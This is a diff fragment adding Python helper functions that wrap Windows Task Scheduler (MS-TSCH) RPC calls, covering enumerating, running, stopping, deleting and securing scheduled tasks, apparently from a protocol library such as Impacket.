+    schRpcSetSecurity['flags'] = flags
+    return dce.request(schRpcSetSecurity)
+
+def hSchRpcGetSecurity(dce, path, securityInformation=0xffffffff):
+    schRpcGetSecurity = SchRpcGetSecurity()
+    schRpcGetSecurity['path'] = checkNullString(path)
+    schRpcGetSecurity['securityInformation'] = securityInformation
+    return dce.request(schRpcGetSecurity)
+
+def hSchRpcEnumFolders(dce, path, flags=TASK_ENUM_HIDDEN, startIndex=0, cRequested=0xffffffff):
+    schRpcEnumFolders = SchRpcEnumFolders()
+    schRpcEnumFolders['path'] = checkNullString(path)
+    schRpcEnumFolders['flags'] = flags
+    schRpcEnumFolders['startIndex'] = startIndex
+    schRpcEnumFolders['cRequested'] = cRequested
+    return dce.request(schRpcEnumFolders)
+
+def hSchRpcEnumTasks(dce, path, flags=TASK_ENUM_HIDDEN, startIndex=0, cRequested=0xffffffff):
+    schRpcEnumTasks = SchRpcEnumTasks()
+    schRpcEnumTasks['path'] = checkNullString(path)
+    schRpcEnumTasks['flags'] = flags
+    schRpcEnumTasks['startIndex'] = startIndex
+    schRpcEnumTasks['cRequested'] = cRequested
+    return dce.request(schRpcEnumTasks)
+
+def hSchRpcEnumInstances(dce, path, flags=TASK_ENUM_HIDDEN):
+    schRpcEnumInstances = SchRpcEnumInstances()
+    schRpcEnumInstances['path'] = checkNullString(path)
+    schRpcEnumInstances['flags'] = flags
+    return dce.request(schRpcEnumInstances)
+
+def hSchRpcGetInstanceInfo(dce, guid):
+    schRpcGetInstanceInfo = SchRpcGetInstanceInfo()
+    schRpcGetInstanceInfo['guid'] = guid
+    return dce.request(schRpcGetInstanceInfo)
+
+def hSchRpcStopInstance(dce, guid, flags = 0):
+    schRpcStopInstance = SchRpcStopInstance()
+    schRpcStopInstance['guid'] = guid
+    schRpcStopInstance['flags'] = flags
+    return dce.request(schRpcStopInstance)
+
+def hSchRpcStop(dce, path, flags = 0):
+    schRpcStop= SchRpcStop()
+    schRpcStop['path'] = checkNullString(path)
+    schRpcStop['flags'] = flags
+    return dce.request(schRpcStop)
+
+def hSchRpcRun(dce, path, pArgs=(), flags=0, sessionId=0, user = NULL):
+    schRpcRun = SchRpcRun()
+    schRpcRun['path'] = checkNullString(path)
+    schRpcRun['cArgs'] = len(pArgs)
+    for arg in pArgs:
+        argn = LPWSTR()
+        argn['Data'] = checkNullString(arg)
+        schRpcRun['pArgs'].append(argn)
+    schRpcRun['flags'] = flags
+    schRpcRun['sessionId'] = sessionId
+    schRpcRun['user'] = user
+    return dce.request(schRpcRun)
+
+def hSchRpcDelete(dce, path, flags = 0):
+    schRpcDelete = SchRpcDelete()
+    schRpcDelete['path'] = checkNullString(path)
+    schRpcDelete['flags'] = flags
+    return dce.request(schRpcDelete)
+
+def hSchRpcRename(dce, path, newName, flags = 0):
+    schRpcRename = SchRpcRename()
+    schRpcRename['path'] = checkNullString(path)
+    schRpcRename['newName'] = checkNullString(newName)
+    schRpcRename['flags'] = flags
+    return dce.request(schRpcRename)
+
+def hSchRpcScheduledRuntimes(dce, path, start = NULL, end = NULL, flags = 0, cRequested = 10):
+    schRpcScheduledRuntimes = SchRpcScheduledRuntimes()
+    schRpcScheduledRuntimes['path'] = checkNullString(path)
+    schRpcScheduledRuntimes['start'] = start
+    schRpcScheduledRuntimes['end'] = end
+    schRpcScheduledRuntimes['flags'] = flags
+    schRpcScheduledRuntimes['cRequested'] = cRequested
+    return dce.request(schRpcScheduledRuntimes)
+
+def hSchRpcGetLastRunInfo(dce, path):
+    schRpcGetLastRunInfo = SchRpcGetLastRunInfo()
+    schRpcGetLastRunInfo['path'] = checkNullString(path)
+    return dce.request(schRpcGetLastRunInfo)
+
+def hSchRpcGetTaskInfo(dce, path, flags = 0):
+    schRpcGetTaskInfo = SchRpcGetTaskInfo()
+    schRpcGetTaskInfo['path'] = checkNullString(path)
+    schRpcGetTaskInfo['flags'] = flags
+    return dce.request(schRpcGetTaskInfo)
+
+def hSchRpcGetNumberOfMissedRuns(dce, path):
+    schRpcGetNumberOfMissedRuns = SchRpcGetNumberOfMissedRuns()
+    schRpcGetNumberOfMissedRuns['path'] = checkNullString(path)
+    return dce.request(schRpcGetNumberOfMissedRuns)
+
+def hSchRpcEnableTask(dce, path, enabled = True):
+    schRpcEnableTask = SchRpcEnableTask()
+    schRpcEnableTask['path'] = checkNullString(path)
+    if enabled is True:
+        schRpcEnableTask['enabled'] = 1
+    else:
+        schRpcEnableTask['enabled'] = 0
+    return dce.request(schRpcEnableTask)